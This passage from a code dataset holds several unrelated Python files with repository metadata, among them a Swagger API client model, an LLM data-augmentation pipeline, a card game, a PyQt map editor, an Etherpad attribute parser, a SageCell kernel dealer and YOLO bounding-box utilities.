# noqa: E501\n :type: VisibilitySetup\n \"\"\"\n\n self._visibility = visibility\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(AnalysisRequest, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, AnalysisRequest):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","repo_name":"jourzero/veracode-api-clients","sub_path":"restapi/swagger/web_app_scanning_config_service_api_1.0/python-client-generated/swagger_client/models/analysis_request.py","file_name":"analysis_request.py","file_ext":"py","file_size_in_byte":9000,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12456942771","text":"import json\nimport click\nimport gsp.io as io\nfrom gsp.augmenters import *\nfrom tqdm import tqdm\nfrom langchain.prompts import PromptTemplate\nfrom langchain.llms import OpenAI\nfrom langchain.chat_models import ChatOpenAI,ChatAnthropic\nfrom langchain.chains import LLMChain\nimport itertools\nimport pandas as pd\nfrom tqdm import tqdm\n\ndef prepare(ctx):\n \"\"\"\n This pipeline converts a json dataset to a format suitable for finetuning an LLM \n \"\"\"\n data = io.load_jsonl(ctx['input'])\n data_for_finetuning = []\n for obj in data:\n if \"augmented_utterance\" in obj:\n # use augmented utterance if available\n if not obj[\"augmented_utterance\"] == \"\":\n item = {'input': obj['augmented_utterance'],'output': obj['semantics']}\n elif \"styled_utterance\" in obj:\n # see the stylize() function for the key-values in the stylized jsons \n item = {'input': obj['styled_utterance'],'output': obj['semantics']}\n else:\n # if the data has not been stylized then use old keyvalues\n item = {'input': obj['utteranceText'], 'output': obj['desiredSemantics']}\n\n item['text'] = f\"### Input: {item['input']}\\n\\n ### Output: {item['output']}\"\n data_for_finetuning.append(item)\n\n # removing duplicates\n memo = set()\n pruned_data = []\n K = \"input\"\n for sub in data_for_finetuning:\n \n # testing for already present value\n if sub[K] not in memo:\n pruned_data.append(sub)\n \n # adding in memo if new value\n memo.add(sub[K])\n\n #df = pd.DataFrame(pruned_data)\n #df.to_csv(f\"data/output/data_{ctx['type']}.csv\", index=False)\n \n stream = io.record_objs(pruned_data, f\"finetuning_{ctx['type']}\", ctx)\n for i in stream:\n pass\n print(\"Ready for finetuning\")\n return True\n\n\ndef stylize(ctx):\n if ctx['verbose']:\n print(\"Config: \",json.dumps(ctx, indent=2))\n\n # Load up the data \n stream = io.load_original_data(ctx)\n stream = 
io.record_objs(stream, \"original\", ctx)\n\n # Stylize the data and record in a new file \n stylized_stream = stylize_utterance(stream, ctx)\n stylized_stream = io.record_objs(stylized_stream, \"stylized\", ctx)\n\n i = 0;\n for f in stylized_stream:\n i += 1\n\n click.secho(f\"Stylizing completed. Total of {i} utterances available\")\n return True\n\n\ndef augment(ctx):\n if ctx['verbose']:\n print(\"Config: \", json.dumps(ctx, indent=2))\n\n # Load the data\n stylized_stream = io.load_styled_data(ctx)\n\n # Split this into three streams\n accent_stream, audio_stream, text_stream, translate_stream = itertools.tee(stylized_stream, 4)\n\n # accent augmentation\n if ctx['accent']:\n accent_stream = accent_augment(accent_stream, ctx)\n accent_stream = io.record_objs(accent_stream, \"accent\", ctx)\n else:\n for f in accent_stream:\n pass\n\n # audio augmentation\n if ctx['wav']:\n audio_stream = audio_augment(audio_stream, ctx)\n audio_stream = io.record_objs(audio_stream, \"audio\", ctx)\n else:\n for f in audio_stream:\n pass\n \n # Text augmentation\n if ctx['text']:\n text_stream = text_augment(text_stream, ctx)\n text_stream = io.record_objs(text_stream, \"text\", ctx)\n else:\n for f in text_stream:\n pass\n\n # Translate augmentation\n if ctx[\"language\"]:\n translate_stream = translate_augment(translate_stream, ctx)\n translate_stream = io.record_objs(translate_stream, \"translated\", ctx)\n else:\n for f in translate_stream:\n pass\n\n final_stream = itertools.chain(accent_stream,audio_stream,text_stream,translate_stream)\n final_stream = io.record_objs(final_stream, \"FINAL\", ctx)\n\n counter = 0\n for f in final_stream:\n counter += 1\n\n click.secho(f\"Augmentation completed. Total of {counter} utterances available\")\n\n return True\n\n\ndef accent_augment(stream, ctx):\n click.secho(\">> Augmenting with accents\")\n counter = 0\n accents =[\"indian\", \"american\", \"irish\", \"australian\", \"none\"] \n for obj in stream:\n click.secho(f\">> Utterance: [{counter}]\")\n utterance = obj['styled_utterance']\n for accent in tqdm(accents, desc=\"Accents\", position=1, leave=False):\n if not accent == \"none\":\n aug = AccentSpeechAugmenter()\n augmented = aug.run(utterance, accent=accent)\n obj['augmented_utterance'] = augmented['variations'][0]\n obj['augmentation_info']=augmented['metadata']\n yield obj\n else:\n obj['augmented_utterance'] = \"\"\n obj['augmentation_info']= {} \n yield obj\n counter += 1\n\ndef translate_augment(stream, ctx):\n click.secho(\">> Augmenting with translations\")\n languages = [\"de\",\"none\",\"ja\",\"hu\",\"fr\",\"zh\"]\n counter = 0\n for obj in stream:\n click.secho(f\">> Utterance: [{counter}]\")\n utterance = obj['styled_utterance']\n for language in tqdm(languages, desc=\"Languages\", position=1, leave=False):\n if not language == \"none\":\n aug = TranslationAugmenter(ctx)\n augmented = aug.run(utterance, language=language)\n obj['augmented_utterance'] = augmented['variations'][0]\n obj['augmentation_info']=augmented['metadata']\n yield obj\n else:\n obj['augmented_utterance'] = \"\"\n obj['augmentation_info']= {} \n yield obj\n counter += 1\n\n\n\ndef audio_augment(stream, ctx):\n click.secho(\">> Augmenting with audio\")\n wavs = [\"crop\", \"mask\", \"noise\", \"pitch\", \"speed\", \"normalize\", \"polarity_inversion\", \"none\"]\n counter = 0\n for obj in stream:\n click.secho(f\">> Utterance: [{counter}]\")\n utterance = obj['styled_utterance']\n for augmenter in tqdm(wavs, desc=\"Audio\", position=1, leave=False):\n if not augmenter 
== \"none\":\n aug = AudioSpeechAugmenter()\n augmented = aug.run(utterance, augmenter=augmenter)\n obj['augmented_utterance'] = augmented['variations'][0]\n obj['augmentation_info']=augmented['metadata']\n yield obj\n else:\n obj['augmented_utterance'] = \"\"\n obj['augmentation_info']= {} \n yield obj\n counter += 1\n\ndef text_augment(stream, ctx):\n click.secho(\">> Augmenting with text\")\n texts = [\"back_translation\", \"synonym\", \"span_crop\", \"contextual_embedding\", \"none\"]\n text_augmentations = {\"back_translation\": BackTranslationTextAugmenter,\n \"synonym\": SynonymTextAugmenter,\n \"span_crop\": SpanCropTextAugmenter,\n \"contextual_embedding\": ContextualWordEmbeddingTextAugmenter,\n \"none\": \"none\"}\n counter = 0 \n for obj in stream:\n click.secho(f\">> Utterance: [{counter}]\")\n utterance = obj['styled_utterance']\n for augmenter in tqdm(texts, desc=\"Text\", position=1, leave=False):\n if not augmenter == \"none\":\n aug = text_augmentations[augmenter](ctx)\n augmented = aug.run(utterance,1)\n obj['augmented_utterance'] = augmented['variations'][0]\n obj['augmentation_info']=augmented['metadata']\n yield obj\n else:\n obj['augmented_utterance'] = \"\"\n obj['augmentation_info']= {} \n yield obj\n counter += 1\n\n\ndef stylize_one(ctx):\n llm = ChatOpenAI(model_name=ctx['model'])\n styles = {\"none\": NoStyleAugmenter,\n \"directness\": DirectnessStyleAugmenter,\n \"formality\": FormalityStyleAugmenter,\n \"disfluency\": DisfluencyStyleAugmenter,\n \"familiarity\": FamiliarityStyleAugmenter,\n \"word_choice\": WordChoiceStyleAugmenter,\n \"asr\": ASRStyleAugmenter,\n \"correction\": CorrectionStyleAugmenter}\n utterances = []\n for name,style in tqdm(styles.items(), desc=\"Styles\"):\n stylizer = style(llm)\n styled_utterances = stylizer.run(ctx['utterance'], ctx['num_per_style'])\n utterances.append(styled_utterances)\n return utterances\n\n \n\n\ndef stylize_utterance(stream, ctx):\n click.secho(\">> Data loaded. 
Stylizing ...\")\n llm = ChatOpenAI(model_name=ctx['model'])\n styles = {\"none\": NoStyleAugmenter,\n \"directness\": DirectnessStyleAugmenter,\n \"formality\": FormalityStyleAugmenter,\n \"disfluency\": DisfluencyStyleAugmenter,\n \"familiarity\": FamiliarityStyleAugmenter,\n \"word_choice\": WordChoiceStyleAugmenter,\n \"asr\": ASRStyleAugmenter,\n \"correction\": CorrectionStyleAugmenter}\n\n counter = 0\n for obj in stream:\n click.secho(f\">> Utterance: [{counter}]\")\n # Do style extensions \n for style in tqdm(ctx['style'], desc=\"Styles\", position=0, leave=False):\n stylizer = styles[style](llm)\n styled_utterances = stylizer.run(obj['utteranceText'], ctx['num_variations'])\n for styled_utterance in tqdm(styled_utterances['variations'], desc=\"Variations\", position=1, leave=False):\n new_item = {'base_utterance': obj['utteranceText'],\n 'styled_utterance': styled_utterance,\n 'stylizer': styled_utterances['metadata']['augmenter'],\n 'semantics': obj['desiredSemantics'],\n 'robot_repertoire': obj['promptInfo']}\n yield new_item\n counter += 1\n\n# TO BE DEPRECATED\ndef run(ctx):\n if ctx['verbose']:\n print(\"Config: \",json.dumps(ctx, indent=2))\n\n # Load up the data \n click.secho(\">> Loading data\")\n stream = io.load_data(ctx)\n stream = io.record_objs(stream, \"original\", ctx)\n\n \n # Stylize the data and record in a new file \n click.secho(\">> Stylizing data\")\n stylized_stream = stylize(stream, ctx)\n stylized_stream = io.record_objs(stylized_stream, \"stylized\", ctx)\n \n # Split this into three streams\n accent_stream, audio_stream, text_stream = itertools.tee(stylized_stream, 3)\n\n # accent augmentation\n click.secho(\">> Augmenting with accents\")\n accent_stream = accent_augment(accent_stream, ctx)\n accent_stream = io.record_objs(accent_stream, \"accent\", ctx)\n\n # audio augmentation\n click.secho(\">> Augmenting with audio\")\n audio_stream = audio_augment(audio_stream, ctx)\n audio_stream = io.record_objs(audio_stream, \"audio\", ctx)\n \n # Text augmentation\n click.secho(\">> Augmenting with text\")\n text_stream = text_augment(text_stream, ctx)\n text_stream = io.record_objs(text_stream, \"text\", ctx)\n\n\n final_stream = itertools.chain(accent_stream,audio_stream,text_stream)\n final_stream = io.record_objs(final_stream, \"FINAL\", ctx)\n\n for f in final_stream:\n pass\n\n return True\n\n\n","repo_name":"vasanthsarathy/gsp","sub_path":"gsp/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":11176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27483048646","text":"# Wrestling Card Game\nfrom random import shuffle\nfrom enum import IntEnum\n\nsuits = ('HEART', 'SPADES', 'DIAMONDS', 'CLUBS')\nvalues = ('A', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K')\n\n\nclass CardRank(IntEnum):\n TWO = 2\n THREE = 3\n FOUR = 4\n FIVE = 5\n SIX = 6\n SEVEN = 7\n EIGHT = 8\n NINE = 9\n TEN = 10\n JACK = 11\n QUEEN = 12\n KING = 13\n ACE = 14\n\n\nRANKS = {\n '2': CardRank.TWO,\n '3': CardRank.THREE,\n '4': CardRank.FOUR,\n '5': CardRank.FIVE,\n '6': CardRank.SIX,\n '7': CardRank.SEVEN,\n '8': CardRank.EIGHT,\n '9': CardRank.NINE,\n '10': CardRank.TEN,\n 'J': CardRank.JACK,\n 'Q': CardRank.QUEEN,\n 'K': CardRank.KING,\n 'A': CardRank.ACE\n}\n\n\nclass Card:\n\n def __init__(self, suit, value):\n self.suit = suit\n self.value = value\n self.rank = RANKS[value]\n\n def __str__(self):\n return self.value + self.suit\n\n\nclass ShuffledDeck:\n def __init__(self):\n 
self.deck = []\n\n for suit in suits:\n for value in values:\n self.deck.append(Card(suit, value))\n\n shuffle(self.deck)\n\n def draw(self):\n return self.deck.pop()\n\n\ndeck = ShuffledDeck()\nfor i in range(0, 52):\n card1 = deck.draw()\n print(card1)\n","repo_name":"DWIGHT121/OOP","sub_path":"cardgame.py","file_name":"cardgame.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43567408684","text":"from PyQt4 import QtCore, QtGui\nimport os\nimport sys\nimport time\n\nfrom xVMapEdit import EditorWindow, EditorGlobals, ServerChooser\nfrom xVClient import Sprite, ErrorReporting\n\n\nclass MapEditorApp(object):\n \"\"\"\n Main application class for the map editor.\n \"\"\"\n\n # constants\n appname = \"Map Editor\"\n \"\"\"The application name that is shown in the title bar.\"\"\"\n\n def __init__(self):\n # initialize some variables\n self.QtApp = None\n \"\"\"The main Qt application object.\"\"\"\n \n self.MainWindow = None\n '''Handle to the main window object.'''\n \n self.ResourcesUsed = None\n '''Name of the server whose resources are in use.'''\n \n self.Sprites = None\n '''Handle to the current sprite manager.'''\n \n self.basetime = time.time()\n '''Unix time that the program was started.'''\n\n def LoadResources(self):\n \"\"\"\n Loads all resources.\n \"\"\"\n # What resources are we using?\n chooser = ServerChooser.ServerChooser(parent=None)\n chooser.setModal(True)\n chooser.exec_()\n \n # Load the sprites.\n try:\n self.Sprites = Sprite.SpriteManager(name=self.ResourcesUsed)\n except Sprite.SpriteDirectoryNotFound:\n # bail out\n sys.exit(0)\n\n def Main(self):\n \"\"\"\n Called when the application is run.\n \"\"\"\n # okay, go ahead and engage Qt\n self.QtApp = QtGui.QApplication(sys.argv)\n \n # set up error reporting\n ErrorReporting.ConfigureLogging()\n\n # load up what we need\n self.LoadResources()\n\n # and here we go! 
show the main window!\n self.MainWindow = EditorWindow.MainWindow()\n self.MainWindow.SetupWindow()\n self.MainWindow.show()\n\n # let Qt handle the event loop\n retval = self.QtApp.exec_()\n return retval\n \n def GetTick(self):\n '''\n Gets the number of milliseconds since the editor started running.\n \n @return: The number of milliseconds since the editor started running\n '''\n return int((time.time() - self.basetime) * 1000)\n\n\ndef Main():\n '''\n Runs the application.\n \n This is normally called from the executable script\n (bin/xVectorMapEditor.py).\n '''\n # Run the application.\n app = MapEditorApp()\n EditorGlobals.MainApp = app\n retcode = app.Main()\n sys.exit(retcode)\n","repo_name":"buchwj/xvector","sub_path":"mapeditor/xVMapEdit/MapEditor.py","file_name":"MapEditor.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41692120822","text":"#!/usr/bin/env python\n\nclass Attributes:\n def __init__(self, conn=None, pad=None,\n pool=dict(numToAttrib={}, attribToNum={})):\n self._conn = conn\n self._pad = pad\n self._pool = pool\n\n self._attrinorder = list()\n self._attrlists = dict()\n self._authors = dict()\n\n self._attribs = dict()\n\n def get(self, attr):\n attr = str(int(attr, 36))\n if attr in self._pool['numToAttrib'].keys():\n attr, param = self._pool['numToAttrib'][attr]\n elif self._pool and self._pad:\n self._pool = self._conn.getAttributePool(self._pad)['pool']\n return self.get(attr)\n elif not attr in self._pool['numToAttrib'].keys():\n raise Exception(\"Attribute not found:\", attr)\n else:\n attr, param = self._pool['numToAttrib'][attr]\n if param != \"false\":\n return attr, param\n return attr, False\n\n def reset_list(self, idx):\n if idx in self._attrlists.keys():\n params = tuple((idx,) + self._attrlists[idx])\n self._attrinorder.remove(params)\n del self._attrlists[idx]\n return True\n return False\n\n def get_pool(self):\n return self._pool\n\n def apply(self, text):\n char_dict = {}\n for i in range(0, len(text)):\n char_dict[i] = dict(char=text[i], attr=[], param=[])\n\n for idx, length, attr, param in self._attrinorder:\n for i in range(idx, idx+length):\n if attr == \"list\":\n if \"list\" in char_dict[i][\"attr\"]:\n l = char_dict[i][\"attr\"].index(\"list\")\n char_dict[i][\"attr\"].remove(\"list\")\n del char_dict[i][\"param\"][l]\n #elif attr == \"start\":\n # continue\n elif attr.startswith(\"insertorder\"):\n continue\n elif attr.startswith(\"lmkr\"):\n continue\n\n char_dict[i]['attr'].append(attr)\n char_dict[i]['param'].append(param)\n\n out = \"\"\n state = set()\n for i in range(0, len(text)):\n before = \"\"\n after = \"\"\n c = char_dict[i][\"char\"]\n if i in self._authors.keys():\n before += \"[\" + self._authors[i] + \"]\"\n for a, p in zip(char_dict[i][\"attr\"], char_dict[i][\"param\"]):\n if not a in state:\n before += \"[\" + a + \"]{\"\n state.add(a)\n if not a in char_dict[i+1][\"attr\"]:\n after += \"}\"\n state.remove(a)\n\n out += before + char_dict[i][\"char\"] + after\n\n return out\n\n def store(self, op, idx):\n attr = op[\"attribs\"]\n idx += 1\n for attr in attr.split(\"*\")[1:]:\n attr, param = self.get(attr)\n if attr == \"list\":\n self._attrlists[idx] = (op[\"chars\"], attr, param)\n self._attrinorder.append((idx, op[\"chars\"], attr, param))\n elif attr == \"author\":\n self._authors[idx] = param\n elif param == \"true\":\n self._attrinorder.append((idx, op[\"chars\"], attr, param))\n elif not param:\n 
self._attrinorder.remove((idx, op[\"chars\"], attr, \"true\"))\n            # else:\n            #     print \"XX\", idx, op[\"chars\"], attr, param\n\n    def extract(self, attr):\n        for attr in attr.split(\"*\")[1:]:\n            yield self.get(attr)\n\n","repo_name":"guyzmo/PyEtherpadLite","sub_path":"src/py_etherpad/Attributes.py","file_name":"Attributes.py","file_ext":"py","file_size_in_byte":3573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"}
+{"seq_id":"23538077481","text":"\"\"\"Write a program that uses nested loops to collect data and calculate the average rainfall over a period of years. The program should first ask for the number of years. The outer loop will iterate once for each year. The inner loop will iterate 12 times, once for each month. Each iteration of the inner loop will ask the user for the inches of rainfall for that month. After all iterations, the program should display the number of months, the total inches of rainfall, and the average rainfall per month for the entire period.\n\n\"\"\"\ntotalrain = 0.0\nmonthcount = 0.0\nyears = int(input(\"how many years would you like to collect data for? (Enter a numerical value): \"))\nfor r in range(years): # outer loop, for calculating years\n    print(\"Year \", r + 1)\n    for months in (\"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"July\", \"August\", \"September\", \"October\", \"November\", \"December\"): # inner loop asks for the rainfall of every month\n        print(\"How many inches of rainfall for\", months, \":\")\n        rainfall = float(input())\n        totalrain += rainfall # adds all rainfall together for each month\n        monthcount += 1 # counts every month for division\n\nprint(\"Total amount of recorded Rainfall: \", format(totalrain, \".2f\"))\naverageRainfall = totalrain / monthcount\nprint(\"Average rainfall: \", format(averageRainfall, '.2f'))\n","repo_name":"devingrischow/school_year_2021","sub_path":"Python_2021/prg/PycharmProjects/pythonius/4.3 Average_Rainfall.py","file_name":"4.3 Average_Rainfall.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"73860692712","text":"import asyncio\nimport time\n\nimport jupyter_client.session\nimport tornado.ioloop\nimport zmq\n\nfrom log import logger\nimport misc\n\n\nconfig = misc.Config()\n\n\nclass KernelConnection(object):\n    \"\"\"\n    Kernel from the dealer point of view.\n    \n    Handles connections over ZMQ sockets to compute kernels.\n    \"\"\"\n    \n    def __init__(self, dealer, id, connection, lifespan, timeout):\n        self._on_stop = None\n        self._dealer = dealer\n        self.id = id\n        self.executing = 0\n        self.status = \"starting\"\n        now = time.time()\n        self.hard_deadline = now + lifespan\n        self.timeout = timeout\n        if timeout > 0:\n            self.deadline = now + self.timeout\n        self.session = jupyter_client.session.Session(\n            key=connection[\"key\"].encode())\n        self.channels = {}\n        context = zmq.Context.instance()\n        address = connection[\"ip\"]\n        if \":\" in address:\n            address = \"[{}]\".format(address)\n        for channel, socket_type in (\n                (\"shell\", zmq.DEALER), (\"iopub\", zmq.SUB), (\"hb\", zmq.REQ)):\n            socket = context.socket(socket_type)\n            socket.connect(\"tcp://{}:{}\".format(address, connection[channel]))\n            stream = zmq.eventloop.zmqstream.ZMQStream(socket)\n            stream.channel = channel\n            self.channels[channel] = stream\n        self.channels[\"iopub\"].socket.subscribe(b\"\")\n        self.start_hb()\n        logger.debug(\"KernelConnection initialized\")\n    \n    def on_stop(self, callback):\n        self._on_stop = 
callback\n \n def start_hb(self):\n logger.debug(\"start_hb for %s\", self.id)\n hb = self.channels[\"hb\"]\n ioloop = tornado.ioloop.IOLoop.current()\n\n def pong(message):\n #logger.debug(\"pong for %s\", self.id)\n self._expecting_pong = False\n\n hb.on_recv(pong)\n self._expecting_pong = False\n\n def ping():\n #logger.debug(\"ping for %s\", self.id)\n now = ioloop.time()\n if self._expecting_pong:\n logger.warning(\"kernel %s died unexpectedly\", self.id)\n self.stop()\n elif now > self.hard_deadline:\n logger.info(\"hard deadline reached for %s\", self.id)\n self.stop()\n elif (self.timeout > 0\n and now > self.deadline\n and self.status == \"idle\"):\n logger.info(\"kernel %s timed out\", self.id)\n self.stop()\n else:\n hb.send(b'ping')\n self._expecting_pong = True\n\n self._hb_periodic_callback = tornado.ioloop.PeriodicCallback(\n ping, config.get(\"beat_interval\") * 1000)\n\n def start_ping():\n logger.debug(\"start_ping for %s\", self.id)\n if self.alive:\n self._hb_periodic_callback.start()\n\n self._start_ping_handle = ioloop.call_later(\n config.get(\"first_beat\"), start_ping)\n self.alive = True\n\n def stop(self):\n logger.debug(\"stopping kernel %s\", self.id)\n if not self.alive:\n logger.warning(\"not alive already\")\n return\n self.stop_hb()\n if self._on_stop:\n self._on_stop()\n for stream in self.channels.values():\n stream.close()\n self._dealer.stop_kernel(self.id)\n \n def stop_hb(self):\n logger.debug(\"stop_hb for %s\", self.id)\n self.alive = False\n self._hb_periodic_callback.stop()\n tornado.ioloop.IOLoop.current().remove_timeout(self._start_ping_handle)\n self.channels[\"hb\"].on_recv(None)\n\n\nclass KernelDealer(object):\n r\"\"\"\n Kernel Dealer handles compute kernels on the server side.\n \"\"\"\n \n def __init__(self, provider_settings):\n self.provider_settings = provider_settings\n self._available_providers = []\n self._connected_providers = {} # provider address: last message time\n self._expected_kernels = []\n self._get_queue = []\n self._kernel_origins = {} # id: provider address\n self._kernels = {} # id: KernelConnection\n context = zmq.Context.instance()\n context.IPV6 = 1\n socket = context.socket(zmq.ROUTER)\n self.port = socket.bind_to_random_port(\"tcp://*\")\n # Can configure perhaps interface/IP/port\n self._stream = zmq.eventloop.zmqstream.ZMQStream(socket)\n self._stream.on_recv(self._recv)\n logger.debug(\"KernelDealer initialized\")\n \n def _try_to_get(self):\n r\"\"\"\n Send a get request if possible AND needed.\n \"\"\"\n while self._available_providers and self._get_queue:\n self._stream.send(self._available_providers.pop(0), zmq.SNDMORE)\n self._stream.send_json([\"get\", self._get_queue.pop(0)])\n logger.debug(\"sent get request to a provider\")\n if self._available_providers:\n logger.debug(\"%s available providers are idling\",\n len(self._available_providers))\n if self._get_queue:\n logger.debug(\"%s get requests are waiting for providers\",\n len(self._get_queue))\n \n def _recv(self, msg):\n logger.debug(\"received %s\", msg)\n assert len(msg) == 2\n addr = msg[0]\n self._connected_providers[addr] = time.time()\n msg = zmq.utils.jsonapi.loads(msg[1])\n if msg == \"get settings\":\n self._stream.send(addr, zmq.SNDMORE)\n self._stream.send_json([\"settings\", self.provider_settings])\n elif msg == \"ready\":\n self._available_providers.append(addr)\n self._try_to_get()\n elif msg[0] == \"kernel\":\n msg = msg[1]\n for i, (rlimits, f) in enumerate(self._expected_kernels):\n if rlimits == msg[\"rlimits\"]:\n 
self._kernel_origins[msg[\"id\"]] = addr\n self._expected_kernels.pop(i)\n f.set_result(msg)\n break\n \n async def get_kernel(self,\n rlimits={}, lifespan=float(\"inf\"), timeout=float(\"inf\")):\n f = asyncio.get_running_loop().create_future()\n self._expected_kernels.append((rlimits, f))\n self._get_queue.append(rlimits)\n self._try_to_get()\n d = await f\n d.pop(\"rlimits\")\n d[\"lifespan\"] = lifespan\n d[\"timeout\"] = timeout\n kernel = KernelConnection(self, **d)\n self._kernels[kernel.id] = kernel\n logger.debug(\"tracking %d kernels\", len(self._kernels))\n logger.info(\"dealing kernel %s\", kernel.id)\n return kernel\n \n def kernel(self, id):\n return self._kernels[id]\n \n def stop(self):\n r\"\"\"\n Stop all kernels and disconnect all providers.\n \"\"\"\n self._stream.stop_on_recv()\n for k in list(self._kernels.values()):\n k.stop()\n for addr in self._connected_providers:\n logger.debug(\"stopping %r\", addr)\n self._stream.send(addr, zmq.SNDMORE)\n self._stream.send_json(\"disconnect\")\n self._stream.flush()\n\n def stop_kernel(self, id):\n addr = self._kernel_origins.pop(id)\n self._stream.send(addr, zmq.SNDMORE)\n self._stream.send_json([\"stop\", id])\n self._kernels.pop(id)\n","repo_name":"sagemath/sagecell","sub_path":"kernel_dealer.py","file_name":"kernel_dealer.py","file_ext":"py","file_size_in_byte":7334,"program_lang":"python","lang":"en","doc_type":"code","stars":184,"dataset":"github-code","pt":"72"} +{"seq_id":"42281015804","text":"from __future__ import division\nimport torch\n\ndef load_classes(path):\n '''\n 加载类别标签\n path:类别文件路径\n '''\n fp = open(path, 'r')\n names = fp.read().split('\\n')[:] # 读取每一行\n return names\n\ndef to_cpu(tensor):\n return tensor.detach().cpu()\n\ndef xywh2xyxy(x):\n '''\n x,y,w,h --> x,y,x.y\n '''\n y = x.new(x.shape)\n y[..., 0] = x[..., 0] - x[..., 2] / 2\n y[..., 1] = x[..., 1] - x[..., 3] / 2\n y[..., 2] = x[..., 0] + x[..., 2] / 2\n y[..., 3] = x[..., 1] + x[..., 3] / 2\n return y\n\ndef weights_init_normal(m):\n '''\n 权重初始化\n '''\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n torch.nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif classname.find('BatchNorm2d') != -1:\n torch.nn.init.normal_(m.weight.data, 1.0, 0.02)\n torch.nn.init.constant_(m.bias.data, 0.0)\n\ndef bbox_wh_iou(wh1, wh2):\n '''\n 计算iou,不考虑相对位置,相当于计算两个框的相似度,计算时将左上角对齐\n '''\n wh2 = wh2.t() # 转置\n w1, h1 = wh1[0], wh1[1]\n w2, h2 = wh2[0], wh2[1]\n inter_area = torch.min(w1, w2) * torch.min(h1, h2)\n union_area = (w1 * h1 + 1e-16) + w2 * h2 - inter_area # 这里防止分母为0\n return inter_area / union_area\n\ndef bbox_iou(box1, box2, x1y1x2y2=True):\n '''\n 给定两个矩形框坐标,计算iou,考虑相对位置的\n '''\n if not x1y1x2y2: # 如果给定的是中心坐标(x,y)和宽高(w,h),那么计算出四个角的坐标\n b1_x1, b1_x2 = box1[:, 0] - box1[:, 2] / 2, box1[:, 0] + box1[:, 2] / 2\n b1_y1, b1_y2 = box1[:, 1] - box1[:, 3] / 2, box1[:, 1] + box1[:, 3] / 2\n b2_x1, b2_x2 = box2[:, 0] - box2[:, 2] / 2, box2[:, 0] + box2[:, 2] / 2\n b2_y1, b2_y2 = box2[:, 1] - box2[:, 3] / 2, box2[:, 1] + box2[:, 3] / 2\n else: # 直接给定的就是四个角的坐标\n b1_x1, b1_y1, b1_x2, b1_y2 = box1[:, 0], box1[:, 1], box1[:, 2], box1[:, 3]\n b2_x1, b2_y1, b2_x2, b2_y2 = box2[:, 0], box2[:, 1], box2[:, 2], box2[:, 3]\n \n # 计算两个矩形框交集和并集的面积,画图就知道了\n inter_rect_x1 = torch.max(b1_x1, b2_x1)\n inter_rect_y1 = torch.max(b1_y1, b2_y1)\n inter_rect_x2 = torch.min(b1_x2, b2_x2)\n inter_rect_y2 = torch.min(b1_y2, b2_y2)\n # 交集面积\n inter_area = torch.clamp(inter_rect_x2 - inter_rect_x1 + 1, min=0) * torch.clamp(\n inter_rect_y2 - inter_rect_y1 + 1, min=0\n )\n 
b1_area = (b1_x2 - b1_x1 + 1) * (b1_y2 - b1_y1 + 1) # 第一个矩形框面积 \n b2_area = (b2_x2 - b2_x1 + 1) * (b2_y2 - b2_y1 + 1) # 第二个矩形框面积\n\n iou = inter_area / (b1_area + b2_area - inter_area + 1e-16) # 防止分母为0\n\n return iou\n\ndef non_max_suppression(prediction, conf_thres=0.5, nms_thres=0.4):\n \"\"\"\n Removes detections with lower object confidence score than 'conf_thres' and performs\n Non-Maximum Suppression to further filter detections.\n Returns detections with shape:\n (x1, y1, x2, y2, object_conf, class_score, class_pred)\n \"\"\"\n\n # From (center x, center y, width, height) to (x1, y1, x2, y2)\n prediction[..., :4] = xywh2xyxy(prediction[..., :4])\n output = [None for _ in range(len(prediction))]\n for image_i, image_pred in enumerate(prediction):\n # Filter out confidence scores below threshold\n image_pred = image_pred[image_pred[:, 4] >= conf_thres]\n # If none are remaining => process next image\n if not image_pred.size(0):\n continue\n # Object confidence times class confidence\n score = image_pred[:, 4] * image_pred[:, 5:].max(1)[0]\n # Sort by it\n image_pred = image_pred[(-score).argsort()]\n class_confs, class_preds = image_pred[:, 5:].max(1, keepdim=True)\n detections = torch.cat((image_pred[:, :5], class_confs.float(), class_preds.float()), 1)\n # Perform non-maximum suppression\n keep_boxes = []\n while detections.size(0):\n large_overlap = bbox_iou(detections[0, :4].unsqueeze(0), detections[:, :4]) > nms_thres\n label_match = detections[0, -1] == detections[:, -1]\n # Indices of boxes with lower confidence scores, large IOUs and matching labels\n invalid = large_overlap & label_match\n weights = detections[invalid, 4:5]\n # Merge overlapping bboxes by order of confidence\n detections[0, :4] = (weights * detections[invalid, :4]).sum(0) / weights.sum()\n keep_boxes += [detections[0]]\n detections = detections[~invalid]\n if keep_boxes:\n output[image_i] = torch.stack(keep_boxes)\n\n return output\n\ndef 